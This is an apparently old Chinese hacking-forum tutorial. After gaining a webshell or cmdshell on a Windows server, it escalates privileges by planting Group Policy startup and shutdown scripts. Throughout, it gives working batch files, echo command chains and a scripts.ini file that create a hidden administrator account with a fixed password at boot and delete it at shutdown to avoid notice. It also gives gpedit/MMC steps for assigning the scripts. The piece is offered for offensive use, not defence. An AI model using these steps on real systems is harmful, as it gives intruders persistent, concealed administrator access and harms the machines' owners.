大家看过“我非我[F.S.T]”总结的提升管理员权限8法,现在我们利用启动脚本和批处理在获得shell的情况下提升权限第9法: 启动脚本法!!首家批漏啊,大家可得看好了,我尽量废话少说,言简意赅的表述。
注:启动脚本是邀请用户登录之前运行的批文件,它的功能类似于Win9X和DOS中的自动执行批处理文件autoexec.bat,由于脚本是在windows登陆之前运行,所以我们可以修改脚本内容来对系统进行设置,如启动一个后门程序,添加一个管理员帐号,修改管理员帐号等等,随你想吧.嘎嘎..
本文首先介绍通过webshell添加一个隐藏帐号(毕竟这才是大家最关心的:)),然后具体讲解一下出现问题后的解决方法.如何添加一个帐号?
一.如果你可以直接写文件,如用海洋.
(1) 首先,我们用海洋编写了一个新建管理员的批处理文件swords1.bat,如下:
net user swords$ eviloctal /add
net localgroup administrators swords$ /add
这个批处理文件加了一个管理员名为swords$,密码为eviloctal的隐藏帐户,将文件swords1.bat保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup"下.
(注意:c:\winnt是系统目录,如果系统盘不是c盘,请相应修改为系统目录即可.在本机中查看,你也许找不到GroupPolicy\Machine\Scripts\Startup这个文件夹,可以选择工具/文件夹选项/查看/单击显示所有文件和文件夹.在海洋中用fso可以显示所有文件就不必多此一举了。)
(2)接下来编写一个删除管理员的批处理文件swords2.bat,很简单,一句话即可,如下: net user swords$ /del
这个批处理文件删除一个管理员名为swords$的隐藏帐户,将文件swords2.bat保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown"下.
(3)编写一个启动/关机脚本配置文件scripts.ini
(注意:scripts是默认的配置文件名,不能改名!)如下:
[Startup]
0CmdLine=swords1.bat
0Parameters=
[Shutdown]
0CmdLine=swords2.bat
0Parameters=
将文件scripts.ini保存到C:\winnt\system32\GroupPolicy\Machine\Scripts下.
二.如果你有一个cmdshell,有echo的权限就可以了,这样添加:
(1)echo一个swords1.vbs启动时用的文件
echo on error resume next> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup \swords1.vbs
echo net user swords$ eviloctal /add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs
echo net localgroup administrators swords$ /add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs
注意:第一行一定要用’>’,这样才能删除原数据.
(2)echo一个swords2.vbs关闭时用的脚本文件
echo net user swords$ /del> C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown\swords2.vbs
(3)编写一个启动/关机脚本配置文件scripts.ini
echo [Startup] > C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo 0CmdLine=swords1.vbs >>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo 0Parameters= >>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo [Shutdown] >>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo 0CmdLine=swords2.vbs>>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo 0Parameters=>>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
将文件scripts.ini保存到C:\winnt\system32\GroupPolicy\Machine\Scripts下.
最后,等待服务器重新启动计算机或自己强制其启动(手段很多啊)。然后你就等着玩吧。
注意:本方法使用时,须服务器已经指派了计算机启动脚本,否则本方法可能不成功。
三.如果你是本机,或已经连接了对方的3389,但是只有普通用户权限,怎么办?
在启用计算机启动/关机脚本前,必须进行指派.指派计算机启动/关机脚本需要通过组策略MMC(管理控制台)管理单元进行:
(1) 开始/运行/MMC,打开微软控制台
(2) 按ctrl+M键,打开添加/删除管理单元窗口,单击添加。
(3) 在"添加独立管理单元"对话框内选择"组策略",点击"添加"按钮.
(4) 择缺省的"本地计算机"组策略对象/完成/确定/确定,关闭窗口。
(5) 在生成的“本地计算机”策略中打开计算机配置/Windows设置/脚本(启动/关闭)"节点,双击"启动"或"关机"项目设置计算机启动或关机时使用的脚本,单击浏览加如您要启动的脚本文件,确定。
(6)设置完毕,保存后退出组策略MMC管理单元。等组策略刷新后,这些脚本就会在计算机启动和关机时起作用。
注意:你也可以直接打开gpedit.msc, 依次展开计算机配置/Windows设置/脚本(启动/关闭),然后添加一个启动脚本。然后依次展开“计算机配置/管理模板/系统/登陆,将“显示启动脚本的运行状态”启用。重新启动之后看看吧,打开cmd,输入net user swords$显示详细的信息,噶噶,多了一个用户吧。
|
